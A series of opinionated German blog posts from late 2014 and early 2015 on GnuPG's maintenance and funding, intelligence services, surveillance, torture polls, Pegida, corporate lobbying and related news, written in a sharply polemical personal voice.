Update: Die ARD hat die Internet-Rechte nicht erworben, der Film wird daher nicht in der Mediathek auftauchen. Und Wiederholungen sind auch nicht geplant. :-( (Danke, Christof)

Mon Feb 9 2015

[l] Metronaut wird gerade abgemahnt. Es ging um diese offensichtliche Satire, bei der auf Metronaut ein paar Motive aus der Nazi-Zeit als angebliche moderne Werbekampagne der tatsächlichen Berliner Olympia-Bewerbung zu sehen waren. Tja, so sonderlich weit war es offensichtlich nicht her mit Je Suis Charlie. Ich als Laie kann mir ja nicht vorstellen, dass die da juristisch eine Basis für irgendwas haben. Aber hey, vor Gericht und auf hoher See … wer denen helfen will: über Spenden per Flattr oder so würden sie sich freuen.

Sat Feb 7 2015

[l] Noch was zu gnupg:
It's encouraging to see the GnuPG project benefitting from similar largess. But it also raises the question: how is the money best spent? Matt Green, a professor specializing in cryptography at Johns Hopkins University, said he has looked at the GnuPG source code and found it in such rough shape that he regularly assigns chunks of it to his students for review.
"At the end I ask how they felt about it and they all basically say: 'God, please I never want to do something like this again,'" Green told Ars.
Soweit würde ich jetzt nicht gehen. Immerhin benutzt Werner Koch seit Jahren size_t für Längen und Offsets. Ich habe schon viel schlimmeren Code gelesen. Ich glaube ja, die Jugend von heute ist verweichlicht. Was sollen die denn erst sagen, wenn sie mal OpenSSL erben und warten sollen eines Tages?
Übrigens, einen noch:
Given the ramshackle state of massive GnuPG code base, it's not clear what's the best path forward. A code audit is one possibility, but such reviews typically cost a minimum of $100,000 for complex crypto programs, and it's not unheard of for the price to be double that.
Stimmt. Oder man hat halt Glück und der Fefe macht das kostenlos in seiner Freizeit. Und dann schmeißt Werner Koch ~~die geschenkten $100k~~ den Patch weg und ich pflege 9 Jahre lang meinen Patch parallel weiter. Und Werner Koch winselt dann herum, dass er nicht versteht, wieso ihm keiner Geld nachwirft.
Das liegt daran, dass Werner Koch das Problem ist, nicht die Lösung. Werner Koch macht mit dem Code keine Wartung, eher eine Geiselnahme. Denn wer will schon gnupg forken. Wir kriegen ja schon ohne Fork die Leute nicht in signifikanter Größenordnung dazu, das zu benutzen. Das wäre noch übler, wenn es da auch noch Marktfragmentierung gäbe. Deshalb hat noch niemand gnupg geforkt. Nötig gewesen wäre es seit Jahren. Ich persönlich hoffe seit Jahren, dass Werner endlich hinwirft, und dann jemand die Wartung übernehmen kann, der auch ein Interesse daran hat, daraus ein ordentliches Projekt zu machen. Aber das wird ja jetzt nicht mehr stattfinden. Jetzt wo nicht mehr nur sein Ego sondern auch sein Lebensunterhalt direkt davon abhängt, dass er weiterhin Diktator von gnupg bleibt.
Übrigens hat Werner seine BSI-Kohle über die Jahre nicht gekriegt, weil er dafür gearbeitet hätte, sondern weil Leute mit Beziehungen beim BSI Klinken geputzt haben. Diese Leute haben zwar gesehen, dass Werner Koch das Problem ist, aber sie haben sich gedacht, wenn man dem Geld gibt, vielleicht wird das dann besser. Wurde es leider nicht. Ein bisschen Mitleid war glaube ich auch dabei. Und ein bisschen "das ist das eine erwähnenswerte Kryptoprojekt aus Deutschland, das sollte gefördert werden, um ein Signal zu setzen".
Weil mir schon die ersten Twitter-Experten Neid vorwerfen: Ich habe den Aufwand für den Patch geleistet, weil ich vorher eine Finanzierung für meine Zeit klargemacht hatte. Ich brauche keine Spenden, schon gar nicht von Facebook. Das werde ich zu vermeiden wissen, dass Facebook sich mit einer Spende für eines meiner Projekte, die ich dann aus einer Notlage heraus annehmen muss, gutes Karma kauft. Das Geld, das ich bei Kunden für ehrliche Arbeit nehme, ist Bezahlung, keine Spende. Damit finanziere ich zwar meine Open Source Arbeit, aber keiner meiner Kunden kann damit Werbung machen, über mich Open Source finanziert zu haben. Außer der Kunde hat mich explizit für die Entwicklung von Open-Source-Software bezahlt, versteht sich. Das hat es auch mal gegeben.
Ich finde übrigens nach wie vor, am besten wäre es, wenn wir einfach ein bedingungsloses Grundeinkommen hätten. Dann hätten wir das Finanzierungsproblem für Kunst und Open-Source-Softwareentwicklung gelöst und niemand müsste so entwürdigende Winselnummern bringen. Wir hätten aber immer noch das Code-Geiselnahme-Problem. Dafür kenne ich auch keine gute Lösung.
Update: Ich sollte der Sicherheit halber dazu sagen, dass das nicht bloß meine Eintschätzung ist, dass Werner Koch das Problem ist, sondern ziemlich breiter Konsens. Ich habe diverse Mails von anderen Leuten gekriegt, die mit Werner vergeblich zu kooperieren versucht haben. Ich werde die hier aber nicht zitieren. Das sind die Geschichten der jeweiligen Leute, nicht meine. Sollen die sie erzählen. Mir persönlich war das 8 Jahre lang egal. Ich hatte meinen Patch. Mein persönlicher Moment, ab dem ich der Meinung war, dass da jetzt mal was geschehen muss, war als ich auf dem 31C3 Citizen Four sah.

Thu Feb 5 2015

[l] Liebe Freunde, wir müssen jetzt alle sehr tapfer sein. GCHQ droht damit, die Kontakte zu ihren "deutschen Partnern" abzubrechen, wenn im Untersuchungsausschuss britische Geheimnisse an die Öffentlichkeit kommen.
Update: Da war ich einigen zu subtil. Nein, ich linke nicht auf Hufelschulte, weil man den lesen sollte, oder weil ich dessen Meinung teile oder sonst was, sondern ich habe mich hier über einen grotesken "Argumentstionsversuch" lustig gemacht. Wenn der BND mal was dringend in der Presse positioniert haben will, so wie in diesem Fall seine Kampagne gegen den Untersuchungsausschuss, dann kommt das gerne mal via Hufelschulte rausgeblubbert. Sie haben ihn sogar mal ein bisschen verfolgt. Ordentliche Legendierung ist halt mit Aufwand verbunden!1!! (Danke, Bastiaan)
[l] Ich habe hier vor Jahren schon den Film "Fog of War" von Errol Morris empfohlen. Hier die Empfehlung. Die gilt heute noch genau so wie damals. In meinen Augen einer der wichtigsten Filme, die man überhaupt gesehen haben kann. Gesehen haben muss, würde ich sogar sagen.
Errol Morris hat letztes Jahr wieder so einen Film zu machen versucht, diesmal mit Donald Rumsfeld. Hier mein Blogeintrag dazu.
Heute hatte ich endlich zum ersten Mal die Blu-Ray davon in den Händen. Und während ich mir normalerweise Extras auf DVDs und Blu-Rays spare, weil das irgendwelche belanglosen "schaut mal, wie toll wir das alles gemacht haben" und "die anderen Schauspieler hier sind ja alles soooo toll und was für eine Ehre, mit denen zusammen so einen tollen Film gemacht haben zu dürfen" Dinger sind, habe ich bei Errol Morris mal eine Ausnahme gemacht und auf die Extras geguckt.
Eines der Extras sieht aus wie ein VHS-Rip und geht los mit einem Trailer von Georgia Public Broadcasting.
Dann kommt der Titel.
The Third Annual Report of the Secretaries of Defense.
Dann sagt ein Ansager durch, dass diese Show am 1. Dezember 1989 aufgenommen wurde, im Tennessee Center for Performing Arts oder sowas. Man sieht einen Tisch auf einer Bühne, und da sitzen so Leute wie Donald Rumsfeld, Robert McNamara, aber auch Schlesinger, Laird, Weinberger, einmal das Who is Who der US-Amerikanischen Geschichte. Und die fangen dann an, zu debattieren, was man denn jetzt machen sollte. So mit der Nato und Europa und den eigenen Atomwaffen und dem Verteidigungshaushalt. Jetzt, wo dieser Gorbatschow da in der Sowjetunion so komische Dinge vorschlägt wie dass man mal die Atomwaffen abbauen könnte.
Nach der einen Stunde, die das läuft, brauchte ich erstmal noch ein-zwei Stunden, um auszuatmen. Ein Stück Geschichte! Das sollte jeder Deutsche gesehen haben, finde ich.
Ich habe mal eine Mail an die Georgia Public Broadcasting Company geschickt, das ist meinem Verständnis nach ein non-Profit, d.h. da besteht eine gewisse Chance, dass die mir erlauben, das bei Youtube hochzuladen. Meine Güte, was für ein Flash. Bis die mir antworten kann ich schon alleine für diese Dreingabe empfehlen, sich mal The Unknown Knowns auszuleihen. Den Hauptfilm habe ich noch gar nicht angeguckt. Das geht auch heute nicht mehr, muss mich erst mal geistig mit dieser Debatte auseinandersetzen. Whoa.

Thu Jan 29 2015

[l] Habt ihr euch Sorgen gemacht, dass der Verfassungsschutz nach dem Krieg lauter Alt-Nazis aufgenommen hat?
Da habt ihr natürlich völlig Recht, genau das ist geschehen, aber es gibt dennoch Entwarnung, denn:
Denn die Kontinuität zu den NS-Geheimdiensten war eher dünn und das Amt auf dem rechten Auge auch nicht blinder als andere Behörden.
In der Praxis sah das dann so aus:
das System zweierlei Mitarbeiter in den Nachkriegsjahren: unbelastete Angestellte, die zur Legende des Neuanfangs passten, und frühere Leute von Gestapo oder SS, die mit falschen Namen, bei Tarnfirmen oder Landesbehörden aktiv waren, aber in Wahrheit vom Bundesamt bezahlt wurden. In Köln verstand man es damals trickreich, den Schein zu wahren.
Aber ist alles nicht so schlimm, denn die meisten Alt-Nazis waren schon beim BKA in Lohn und Brot. Außerdem bestanden die Alliierten darauf, dass da keine SS, SD oder Gestapo-Mitarbeiter eingestellt wurden. Also haben sie die halt als "freie Mitarbeiter" geführt.
Gustav Halswick, ein früherer SS-Sturmbannführer, baute ein Scheinunternehmen auf, die Firma „Dokumentenforschung“, wo man die Freien bezahlen und sozial absichern konnte. Selbst das Finanzamt war eingeweiht; kein Steuerprüfer sollte den Schwindel aufdecken.
Die besten Entnazifizierung, die man für Geld kaufen kann!
[l] Eines der Probleme mit Kryptographie ist ja immer, dass man da zwar irgendwelche langen Schlüssel hat, aber die kann sich ja keiner merken. Also tut man sie auf einen Speicher, und der kann dann vom Unterdrückungsstaat beschlagnahmt werden. Daher tut man ein Passwort dran. Aber dessen Herausgabe kann der Unterdrückungsstaat erzwingen.
Was also tun? Vorschläge wie "dann baut man halt Deniability ein" gab es relativ früh im Bezug auf Krypto-Dateisysteme. Die Idee kam m.W. von Julian Assange, damals, als er noch Hacker und nicht Messias war. Da hat man dann zwei Passphrases. Eine schließt die Daten auf, und eine schließt ein harmloses Dateisystem auf, das man in solchen Fällen vorzeigen kann. Aber der Effekt auf einen Unterdrückungsstaat ist ja eher der gegenteilige des Gewünschten. Im Zweifelsfall werden die dann niemandem mehr glauben, dass er ihnen die richtige Passphrase gegeben hat, und dann sitzt man halt bis zum Lebensende in Beugehaft.
2012 gab es ein Paper, das ich verpasst habe, und auf das gerade Bruce Schneier in seinem Blog aufmerksam gemacht hat: Dort geht es darum, ein Passwort so unterbewusst zu lernen, dass man es zwar eingeben kann, aber es nicht bewusst aufsagen kann. Das hilft natürlich gegen einen Unterdrückungsstaat auch nur bedingt. Aber ausgesprochen spannend ist es natürlich trotzdem. (Danke, Stefan)

Wed Jan 28 2015

[l] Der neue Finanzminister von Griechenland hat vorher bei Valve gearbeitet, die sonst Videospiele und die Steam-Vermarktungsplattform für Videospiele machen. Da haben ihn gleich mal einige abgeschrieben, aber guckt euch mal das Video hier an, ein Interview, das er Channel 4 gegeben hat (UK). Der scheint sich da schon Gedanken gemacht zu haben und zu den richtigen Schlüssen gekommen zu sein.

Tue Jan 27 2015

[l] Ihr habt vielleicht mitgekriegt, dass Obama anlässlich der State of the Union-Ansprache auch ein paar Youtube-Interviews mit Youtube-"Celebrities" gemacht hat. Als ich das gesehen habe, dachte ich mir: Naja, der muss halt an die Bevölkerungsschicht ran, die wird von den traditionellen Medien halt nicht erreicht. Schulterzuck. Weitermach.
Die traditionellen Medien haben darauf mit teilweise echt fiesen Heruntermachungen reagiert. Naja, unappetitlich, aber so sind die halt unterwegs. Auch noch nicht spannend.
Hier nimmt einer der Interviewer Stellung, und DAS ist dann doch spannend. Erstaunlicherweise nimmt er schriftlich Stellung und nicht nur in einem Youtube-Video. Alleine schon für seine Auseinandersetzung mit Rupert Murdoch lohnt es sich, das mal durchzulesen. Letztendlich ist das eine Analyse der Rolle der Medien, und — ich habe da durchaus auch Vorurteile gegenüber diesen Youtube-Stars — unerwartet gehaltvoll. Leseempfehlung! (Danke, Daniel)

Mon Jan 26 2015

[l] Was haben wir früher über Microsoft Witze gemacht. Die müssten schon einen Staubsauger bauen, um ein Produkt zu haben, das nicht saugt. Und jetzt werden die mal eben von Apple rechts überholt.
Apple baut eine Armbanduhr mit 2 ½ Stunden Akkulaufzeit. Wenn man sie nicht bedient. Sonst dann vermutlich weniger?
Update: Oh, falsch herum gelesen. Das ist bei "aktiver Benutzung". Sonst mehr. Na dann. m(

Sat Jan 17 2015

[l] Aus dem Tagebuch eines NSA-Cyberkriegers. Die gute Nachricht: Ihre "wir machen jetzt die Platte kaputt"-Tools brauchen erst entsprechenden Administrator-Zugriff und haben keine magischen Tricks. Ihre Angriffe gegen SSH sind bloß eine Backdoor, die sie auf einem vorher kompromittierten System hinterlassen. Sie haben keinen Weg, um eine bestehende SSH-Installation zu hacken. Und es ist ausgesprochen unterhaltsam zu lesen, wieviel Ärger ihnen das defensive Design von OpenSSH gemacht hat :-)

Thu Jan 15 2015

[l] Dass die Atomkonzerne über fast eine Milliarde Euro gegen den Atomausstieg klagen können, war offenbar so angelegt. Die Schadensersatzklagen basieren im Wesentlichen auf einem Schreiben von Volker Bouffier (CDU, natürlich), das RWE damals angefordert hat.
Vorausgegangen war offenbar eine Vereinbarung mit dem damaligen Kanzleramtsminister Ronald Pofalla.
Pofalla ist natürlich auch CDU. Die SPD sind zwar die Großmeister im Umfallen und Verraten, aber wenn es wirklich kriminell werden soll, braucht man die Union.
„Der Brief ist von RWE bestellt worden und die Politik hat geliefert“, sagt Joachim Wieland, Professor für Öffentliches Recht an der Universität für Verwaltungswissenschaften Speyer. „Ein solcher Vorgang hat mit Rechtstaatlichkeit nichts mehr zu tun“, urteilt der ehemalige Leiter der Abteilung Reaktorsicherheit im Bundesumweltministerium Wolfgang Renneberg. „So sind die Millionen-Klagen der Atomkonzerne erst möglich gemacht worden“.
Die beste Demokratie, die man für Geld kaufen kann!
Update: Und, natürlich: "Die meisten Hessen sind nach einem Jahr Regierungsarbeit zufrieden mit Schwarz-Grün". Klar, diesen Bouffier, den will man doch weiter Briefe schreiben lassen!1!! Und die Grünen sind ja eh die CDU für Ökos, insofern passt das schon. (Danke, Uwe)
[l] Auch in Österreich gibt es Kredite in Schweizer Franken in signifikanter Höhe. Darauf weist die österreichische Nationalbank in ihrer aktuellen Told-you-so-Presseerklärung hin.
Es ist aber festzuhalten, dass die von der SNB gesetzten Maßnahmen angesichts eines noch ausstehenden Volumens von Franken-Krediten an private Haushalte und Unternehmen in Österreich in Höhe von 29,5 Mrd EUR per Ende November 2014 von erheblicher Relevanz sind.
Ich frage mich, wie hoch die Zahl in Deutschland ist.
Update: Hier ist eine Grafik, die mir jemand gemailt hat. (Danke, Rene)
[l] Im Fnord-Jahresrückblick haben wir uns noch mit DDR-Mauerbau-Bildern über die Ukraine lustig gemacht, weil Klitschko eine Mauer zur Abwehr der Russen bauen wollte. Und jetzt will angeblich Saudi-Arabien eine Mauer gegen ISIS bauen.

Tue Jan 13 2015

[l] Habt ihr das auch gehört, dass Charlie Hebdo die Anschläge schon irgendwie verdient hat, weil sie so rassistische und fremdenfeindliche Karikaturen gemacht haben?
Dann solltet ihr euch mal diese Webseite anschauen, die die Cartoons erklärt.

Mon Jan 12 2015

[l] Netanjahu hat sich in Paris offenbar ziemlich zum Deppen gemacht, und Sarkozy auch.

Tue Dec 30 2014

[l] Einer der 31c3-Vorträge, die mich am meisten berührt und zum Nachdenken gebracht haben, war der über die NSA-Station auf dem Teufelsberg. Meine erste Reaktion war: Nanu? Was ist das denn für ein gelackter Marketing-Fuzzy?
Der trug da eine geschmeidige, einstudiert wirkende Präsentation vor, die man von ihrem Stil her auch im Fernsehen hätte bringen können. Eine Show, sozusagen. Der Mann war Anfang-Mitte der 80er Jahre in Berlin im NSA-Abhörstützpunkt auf dem Berliner Teufelsberg stationiert, und erzählte da seine Geschichte. Das war aber nicht eine technische, nerdige Geschichte (und man darf davon ausgehen, dass die technischen Details bis heute alle geheim sind und er sich strafbar gemacht hätte, wenn er die ausgeplaudert hätte), sondern eine Reihe von Anekdoten über das Leben als NSA-Analyst.
Ich weiß nicht, was ich da erwartet habe. Und je mehr ich mich fragte, was ich eigentlich erwartet habe, desto klarer wurde mir, dass ich im Grunde keinerlei Präzedenzfall hatte, auf den stützend ich irgendeine Erwartungshaltung hätte haben können. Der Vortrag war durchaus kurzweilig, aber die Q&A-Sektion habe ich mir gespart und bin rausgelaufen, um noch einen Sitzplatz im anderen Saal zu kriegen. Wie ich später hörte, wurde er in der Sektion im Wesentlichen vom Publikum beschimpft.
Während des Vortrages und beim Rausgehen hatte ich irgendwie so ein unbestimmtes Gefühl der Unzufriedenheit mit dem Vortrag, aber je mehr Abstand ich gewinne, desto weniger bleibt davon übrig. Der hat genau das geliefert, was er liefern konnte, ohne sich Repressalien auszusetzen. Mehr kann man nicht erwarten.
Ich traf den dann abends nochmal an der Bar ganz oben im Gebäude und wir haben noch ein paar Stunden geplaudert. Dabei kamen dann noch ein paar Aspekte dazu, die mich in dieser Einschätzung noch bestärkt haben. Eine Sache davon will ich mal berichten, weil ich sie so überraschend fand. Und zwar meinte er, er habe schon damit gerechnet, dass er sich danach Beschimpfungen anhören muss, aber er hat in seiner Zeit in Berlin die Deutschen als ausgesucht höfliches Völkchen kennengelernt. Nie würde jemand "Du Arsch" sagen, sagte er, sondern nur sowas wie "Mit Verlaub, ohne Ihnen jetzt zu nahe treten zu wollen, ich halte Sie für ein Arschloch". Und diese Floskeln fehlten bei der Publikumsbeschimpfung. Das hat auf ihn viel stärker gewirkt als die eigentlichen Beschimpfungen. Er hatte den Eindruck, die Leute sind wirklich aus tiefster Seele wütend auf ihn. Das hatte er noch nicht erlebt, dass ein Deutscher so die Contenance verliert.
Wenn man mich nach den Ländern mit den höflichsten Menschen fragen würde, wäre Deutschland eher weiter unten auf der Liste. Insofern sehr erstaunlich, wie er da eine völlig andere Wahrnehmung hatte.
Ich hab ihm dann gesagt: Hör mal zu, du bist der erste und wahrscheinlich einzige, den wir jemals hier haben werden, der zu dem Thema was berichten kann. Du hättest vor allen Leuten auf die Bühne pinkeln können und das wäre noch der beste Vortrag zu dem Thema gewesen, den es beim CCC je gab. Er hatte die Show wohl tatsächlich von langer Hand vorbereitet und war nervös und hatte das vor dem Spiegel geübt und alles. Ich habe ihm jedenfalls nochmal ausdrücklich meinen Dank ausgedrückt, dass er überhaupt gekommen ist, und uns diesen Vortrag gehalten hat. Und ich fand es auch sehr bemerkenswert, dass er schon vor der Fragesektion von sich aus im Vortrag Rationalisierungen eingebaut hatte, und da seine Arbeit zu verteidigen anfing. Ohne seine Arbeit wären Bomben geflogen und wir wären alle tot, und so. Und er hat sich da auch großflächig von Bush distanziert, und Wert darauf gelegt, dass wir verstehen, dass sie damals ja sehr gezielt abgehört hätte und nicht einmal alles mitgenommen haben wie heute. Das glaube ich für meinen Teil eher nicht, aber ich glaube ihm, dass das deren Eindruck von sich und ihrer Arbeit war damals.
Insgesamt habe ich in dem Vortrag neue Perspektiven gewonnen und empfehle ihn daher weiter. Aber nicht nur so mal eben konsumieren und dann weitergehen. Rezipieren und ne Nacht drüber schlafen, da mal in Ruhe drüber nachdenken.
Ich finde es gut, dass der Vortrag so anekdotenhaft war. Denn aus unserer Sicht als abgehörte Berliner war das damals sowas wie eine Sturmtruppen-Kaserne voller gesichtsloser Roboter oder Drohnen. Er hat jetzt gezeigt, dass das auch Menschen waren. Und das finde ich eine sehr wichtige Lektion, dass das alles Menschen waren. Und zwar keine bösen Menschen. Wenn ich in den USA geboren worden wäre zu der Zeit, hätte das auch ich sein können. Diese Rationalisierungen sind jetzt, nachträglich und aus meiner Perspektive offensichtliche Rationalisierungsversuche, aber wenn ich da an seiner Stelle gewesen wäre, bin ich mir nicht sicher, ob sie mir nicht auch gereicht hätten, um das doch zu machen.
Und das ist die Sache, über die wir meiner Ansicht nach alle nochmal dediziert nachdenken müssen. Hätte ich den Job gemacht? Hätte ich das damals als Täter so gesehen wie ich es jetzt als Opfer sehe?
Ich glaube, dass die meisten Meckerer aus dem Publikum einfach ein Ventil brauchten nach Snowden, und dieser Mann war der erste, der sich nahe genug rantraute, dass man ihn direkt beschimpfen konnte. Ich kann das schon auch nachvollziehen, auf menschlicher Ebene, aber es ist auch etwas beschämend, so mit unseren Gästen umzugehen. Und dass er verstanden hat, was er da tut, das ist ja klargeworden bei seinem Vortrag, das hätte man ihn nicht noch rhetorisch fragen müssen danach.
Also, lange Rede kurzer Sinn: Klare Anguckempfehlung. Einmalige Gelegenheit. Nutzt sie. Hier gibt es das Video.
Update: Einen noch, ohne da jetzt Details ausplaudern zu wollen, die er mir noch erzählt hat. Von der Einstellung und seinen Werten her fand ich den näher daran, „einer von uns“ zu sein als „einer von denen“. Ob man so eine NSA-Vergangenheit verzeihen kann, das muss jeder von euch für sich selber entscheiden. So wie ich das verstanden habe ist der jedenfalls nicht mit der Show auf Tournee, auch wenn sie routiniert erschien, sondern hat die nur für uns so vorbereitet und geübt.

Tue Dec 16 2014

[l] Nach all dem (verdienten) Bashing über den Umgang der Amerikaner mit Folter ist es an der Zeit für eine Runde (verdientes) Bashing über den Umgang der Deutschen mit der Ausländerfeindlichkeit. In einer aktuellen Umfrage haben 49% der Befragten Verständnis für das Anliegen von Pegida geäußert. Und oben drauf kommen noch 26%, die "Teils, teils" geantwortet haben. WTF? Jemand zuhause, McFly? Die Bevölkerung lässt sich so vollständig von der in weiten Teilen frei erfundenen Terrorismus-Rhetorik der Geheimdienst-Apologeten verarschen? Der radikale Islamismus ist genau so eine Bullshit-Bedrohung für die Bevölkerung wie die ganzen Bullshit-Bedrohungen davor. Erinnert sich noch jemand daran, wie die Ökoterroristen unsere ganze Industrie wegsprengen würden? Wie uns die organisierte Kriminalität alle umbringen würde? Währenddessen war die einzige organisierte Kriminalität, die wirklich Schaden angerichtet hat, das organisierte Steuervermeidungssystem der Großindustrie.
Und was tun die Dienste, wenn sie Pegida und co sehen? Na denen scheint die Sonne aus dem Arsch, ist doch klar! Jahrelange Propaganda zahlt sich halt aus! Da gießt der Überzeugungstäter Maaßen doch gleich noch ein Fässchen Öl ins Feuer! Für die ist das Win-Win! Die können jetzt ihren Polizeistaat nicht nur mit den angeblichen Salafisten begründen, sondern auch noch mit den Pegida-Sprallos und der Gefahr des Aufeinanderstoßens der beiden Gruppen. Na viel Spaß beim Salafisten-Finden, ihr Pegida-Deppen. Da werdet ihr ganz schön suchen müssen. Das Fernsehen hat bisher wieviele gefunden, zwei? Drei?
Und natürlich legt Maaßen nochmal einen drauf. Nicht dass die ausländerfeindlichen Mobs merken, dass sie gerade von den Diensten gespielt werden.
Der Verfassungsschutzchef betonte aber, der islamistische Terrorismus sei nach wie vor die größte Bedrohung für die Sicherheit in Deutschland.
Ja aber hallo! In Deutschland sind immerhin schon was, Null Menschen durch islamistischen Terror getötet worden? MEHR MENSCHEN STERBEN DURCH POLIZEIGEWALT ALS DURCH ISLAMISTISCHEN TERROR! Durch Fehler des Verfassungsschutzes sind mehr Menschen ums Leben gekommen als durch islamistischen Terror!! Die BND-CIA-Killerdrohnen-Zusammenarbeit hat deutlich mehr Menschenleben gekostet als der islamistische Terrorismus in Deutschland.
Und dann verplappert sich der Maaßen auch noch ganz wunderbar.
Mittlerweile hätten sich mehr als 550 Islamisten aus Deutschland dorthin auf den Weg gemacht. "Das ist ein enormer Anstieg. Anfang des Jahres waren es erst 270 Personen", sagte er. Durch die Erfolge der Terrormiliz IS sei die Anziehungskraft auf "Dschihadwillige" noch verstärkt worden.
Wie, DAS ist die Bedrohung? Dass die angeblichen islamistischen Terroristen das Land verlassen? Wo kommt da noch gleich die Bedrohung für Deutschland ins Spiel, wenn die alle weggehen? Mann Mann Mann. Aber hey, denken war ja noch nie die Stärke von den tumben Nazihorden. Da kann so ein Randdetail schon mal unter den Tisch fallen.
Update: Stimmt nicht, nicht Null Menschen sind in Deutschland durch islamistischen Terror gestorben. Es gab da 2011 den Fall mit den zwei US-Soldaten am Frankfurter Flughafen.
Update: Zum Vergleich:
Tödlicher Blitzschlag ist in Deutschland selten geworden; die durchschnittlich drei bis sieben Todesopfer pro Jahr ließen sich durch weitere Vorsichtsmaßnahmen noch weiter reduzieren.
Mehr Leute sterben in Deutschland, weil sie von einem Blitz getroffen werden, als durch islamistischen Terror!
[l] So langsam glaube ich ja, man müsste mal mit einem Waterboarding-Truck durch die USA fahren und in den Einkaufszentren wahllos Leute waterboarden. Einfach damit die mal sehen, wovon wir hier reden. Der inzwischen leider an Krebs verstorbene Christopher Hitchens hat das ja mal gemacht. Der hat vorher gesagt, ach komm, Waterboarding, ihr Pussies, das ist doch bloß ein bisschen Wassertröpfeln, das ist doch keine Folter! Dann hat er sich von ein paar Folterknechten aus dem US-Militär professionell foltern lassen, und hat sofort seine Position um 180° geändert. Dazu gibt es auch ein Video.
Warum ich das anspreche? Weil in einer Umfrage in den USA 51% der Befragten fanden, dass die CIA-Folter gerechtfertigt war, und weitere 20% hatten keine Meinung. What the fuck!? Eine winzige Mehrheit findet sogar noch, dass es ein Fehler war, den Senatsreport zu veröffentlichen!
Wir müssen also konstatieren: Das ist nicht nur ein systemischer Makel in der US-Regierung, sondern die ganze Bevölkerung ist betroffen. Um so dringender, dass jetzt mal schnell die Generalstaatsanwälte von einem Haufen Ländern zusammenkommen und alle Anklage gegen die Folterknechte erheben. Die Nürnberger Prozesse haben damals ein klares Signal an die Bevölkerung geschickt, dass das nicht nur Pfadfinderlager mit großzügig dimensionierter Heizung waren. Sowas braucht man hier offenbar auch mal.
Je älter ich werde, desto mehr befürchte ich, dass so eine Demokratie zur Aufrechterhaltung der Zivilisation einfach ab und zu mal einen Krieg verlieren muss. Furchtbar.
[l] Bahnbrechendes Urteil des Supreme Court:
A robust 8-1 majority of the Supreme Court ruled today that, contrary to folk belief, ignorance of the law is a perfectly good excuse—as long as it's a cop who's claiming ignorance.
Tolle Wurst! Das beste Justizsystem, das man für Geld kaufen kann! ACHT ZU EINS fanden sie, dass man von einem Polizisten nicht erwarten kann, dass er die Gesetze kennt, die er durchsetzen soll! Was zur Hölle?!
Update: In Deutschland hat der BGH das übrigens genau so entschieden. Die juristische Konstruktion heißt "unvermeidbarer Verbotsirrtum".
Update: Jemand hat mir Auszüge aus der Volltextentscheidung des BGH gemailt, und da sagen die BGH-Richter unter Randnummer 56 tatsächlich das Gegenteil, nämlich dass man bei Polizisten den Verbotsirrtum ausschließen kann. Ich korrigiere daher: Nicht der BGH sieht das genau so, sondern die Vorinstanz.

Mon Dec 15 2014

[l] Das kennt man ja, dass Konzerne Staaten gegeneinander ausspielen, um weniger Steuer zahlen zu müssen. Aber jetzt gibt es noch auf einem anderen Gebiet ein tolles Beispiel.
Vorgeschichte: Microsoft streitet sich seit Jahren mit der US-Regierung darum, mehr Inder und Pakistanis und Europäer als Arbeitskräfte importieren zu dürfen. Das liegt gar nicht unbedingt daran, dass die Amerikaner mehr Kohle verdienen, sondern dass sich die Tech-Industrie einen beinharten Kampf um die paar verbleibenden Programmierer liefert. Microsoft hat extra im Silicon Valley einen fetten Komplex aufgemacht, um attraktiv für die Programmierer dort zu sein (eigentlich ist deren HQ in Washington State im Norden knapp vor der kanadischen Grenze), und in Washington State konkurrieren sie u.a. mit Amazon. Das US-Visum-System ist dabei allen Tech-Firmen massiv im Weg, und die haben immense Beträge in Lobbyisten gesteckt, um da was zu bessern, und es tat sich nie messbar was.
Jetzt kommt diese Meldung rein: Microsoft hat mit der kanadischen Regierung einen Deal ausgehandelt, dass sie da ein Trainingscenter in British Columbia aufmachen (das ist der Teil auf der anderen Seite der Grenze von Washington State aus), und dort ohne die üblichen Regeln ("Sie müssen erst mal nachweisen, dass keine Kanadier für die Position in Frage kommen") Leute einstellen dürfen. Das ist aus meiner Sicht also der große Stinkefinger an die US-Regierung. Schau her, Obama, wenn ihr uns hier nur im Weg rumsteht, dann können wir auch nach Kanada gehen.
Es würde mich nicht wundern, wenn jetzt Bewegung in das US-Visum-System käme. Denn jeder Arbeiter, der in Kanada und nicht in den USA wohnt, kostet den US-Fiskus tausende Dollars an potentiellen Steuereinnahmen.
[l] Was tut man als Pharma-Konzern, wenn das Alzheimer-Mittel aus dem Patentschutz rauszufallen droht? Klar! Man macht eine "neue Version" mit neuem Patentschutz und stellt die Produktion der alten Version ein. Denn das geht ja nicht, dass man dann mit Generikaherstellern konkurrieren muss!1!! Nicht, wenn das Medikament 300 Dollar pro Monat pro Patient in die Kassen spült, und man damit 1,5 Milliarden Dollar Umsatz gemacht hat. Lacher am Rande: Der Pharmakonzern, um den es hier geht, ist eigentlich selber Generikahersteller, und hat dieses Medikament nur im Portfolio, weil sie den Hersteller davon gekauft haben.
Spannenderweise hat die Staatswaltschaft von New York Einspruch gegen die Einstellung eingelegt und ist damit vor Gericht durchgekommen. Den Zusammenhang verstehe ich ja nicht. Für die Frage, ob andere Generikahersteller das nachbauen ist es doch unerheblich, ob die das noch herstellen oder nicht?
Update: Anscheinend funktioniert das in den USA so, dass der Arzt immer das Originalmedikament verschreibt, und die Krankenkasse dann das Generikum substituiert. Das geht nur, wenn es das Originalmedikament noch gibt.

Sun Dec 14 2014

[l] Was passiert eigentlich, wenn man mal in der Innenstadt im Regierungsbezirk gezielt nach IMSI-Catchern sucht? In Oslo hat das mal jemand gemacht. Auf der Grafik sind die grünen Kreise die Gegenden, wo sie Fake-Basisstationen gefunden haben, und bei den roten Punkten haben sie merkwürdige Aktivität bei ihrem Telefon gemessen. Dazu muss man wissen, das Smartphones einmal einen "normalen Computer" haben, der die Apps und das Betriebssystem ausführt, und einmal einen zweiten Prozessor auf einem eingebetteten Mini-Computer, das sogenannte Baseband, das sich um das GSM kümmert. Dieser Baseband-Teil ist seit Jahren ein großes Problem, weil darüber so gut wie nichts bekannt ist. Das wird von irgendwelchen Zulieferern in Taiwan gehackt, ist wahrscheinlich unsicher und hat zusätzlich noch Backdoors drin, aber es gibt keinen Quellcode und die Hardware-Details sind alle Betriebsgeheimnisse, daher ist das so gut wie unauditierbar.
